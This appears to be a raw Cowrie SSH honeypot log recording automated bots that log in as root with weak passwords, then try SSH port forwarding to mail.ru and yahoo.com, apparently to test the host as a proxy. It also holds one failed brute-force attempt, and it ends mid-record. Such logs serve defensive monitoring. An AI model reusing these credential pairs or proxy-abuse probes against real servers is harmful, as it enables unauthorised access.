{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:54.940926Z","src_ip":"77.83.207.83","session":"8f002279646a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":19036,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:19036","sensor":"my-vps","timestamp":"2025-08-31T03:43:55.084515Z","session":"8f002279646a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:55.134650Z","src_ip":"77.83.207.83","session":"8f002279646a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":7397,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:7397","sensor":"my-vps","timestamp":"2025-08-31T03:43:55.276355Z","session":"8f002279646a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:55.326383Z","src_ip":"77.83.207.83","session":"8f002279646a"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:55.377211Z","src_ip":"77.83.207.83","session":"8f002279646a"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":37109,"dst_ip":"1.2.3.4","dst_port":22,"session":"10dd5e4222ea","protocol":"ssh","message":"New connection: 77.83.207.83:37109 (1.2.3.4:22) [session: 10dd5e4222ea]","sensor":"my-vps","timestamp":"2025-08-31T03:43:55.425579Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:55.427057Z","src_ip":"77.83.207.83","session":"10dd5e4222ea"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:55.476775Z","src_ip":"77.83.207.83","session":"10dd5e4222ea"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:55.724046Z","src_ip":"77.83.207.83","session":"10dd5e4222ea"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":10932,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:10932","sensor":"my-vps","timestamp":"2025-08-31T03:43:55.774518Z","session":"10dd5e4222ea"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:55.824273Z","src_ip":"77.83.207.83","session":"10dd5e4222ea"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":8884,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:8884","sensor":"my-vps","timestamp":"2025-08-31T03:43:55.964150Z","session":"10dd5e4222ea"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:56.013911Z","src_ip":"77.83.207.83","session":"10dd5e4222ea"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":13449,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:13449","sensor":"my-vps","timestamp":"2025-08-31T03:43:56.155951Z","session":"10dd5e4222ea"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:56.205756Z","src_ip":"77.83.207.83","session":"10dd5e4222ea"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:56.256906Z","src_ip":"77.83.207.83","session":"10dd5e4222ea"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":37201,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d5f97d023d3","protocol":"ssh","message":"New connection: 77.83.207.83:37201 (1.2.3.4:22) [session: 2d5f97d023d3]","sensor":"my-vps","timestamp":"2025-08-31T03:43:56.305249Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:56.305964Z","src_ip":"77.83.207.83","session":"2d5f97d023d3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:56.355700Z","src_ip":"77.83.207.83","session":"2d5f97d023d3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:56.603502Z","src_ip":"77.83.207.83","session":"2d5f97d023d3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":536,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:536","sensor":"my-vps","timestamp":"2025-08-31T03:43:56.654132Z","session":"2d5f97d023d3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:56.704054Z","src_ip":"77.83.207.83","session":"2d5f97d023d3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":31254,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:31254","sensor":"my-vps","timestamp":"2025-08-31T03:43:56.843862Z","session":"2d5f97d023d3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:56.893510Z","src_ip":"77.83.207.83","session":"2d5f97d023d3"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"P@ssw0rd123","message":"login attempt [hadoop/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:43:56.983546Z","src_ip":"212.227.235.229","session":"c60e4489ac0a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":19508,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:19508","sensor":"my-vps","timestamp":"2025-08-31T03:43:57.035791Z","session":"2d5f97d023d3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:57.085326Z","src_ip":"77.83.207.83","session":"2d5f97d023d3"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:57.136353Z","src_ip":"77.83.207.83","session":"2d5f97d023d3"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":37280,"dst_ip":"1.2.3.4","dst_port":22,"session":"16b0ce23f5e3","protocol":"ssh","message":"New connection: 77.83.207.83:37280 (1.2.3.4:22) [session: 16b0ce23f5e3]","sensor":"my-vps","timestamp":"2025-08-31T03:43:57.186774Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:57.196469Z","src_ip":"77.83.207.83","session":"16b0ce23f5e3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sh